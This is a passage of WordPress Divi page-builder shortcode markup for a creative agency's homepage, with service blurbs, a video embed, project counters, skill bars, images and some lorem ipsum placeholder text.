border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"Why We creative agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-Copy-12.png\" alt=\"digital advertising\" title_text=\"digital advertising\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" 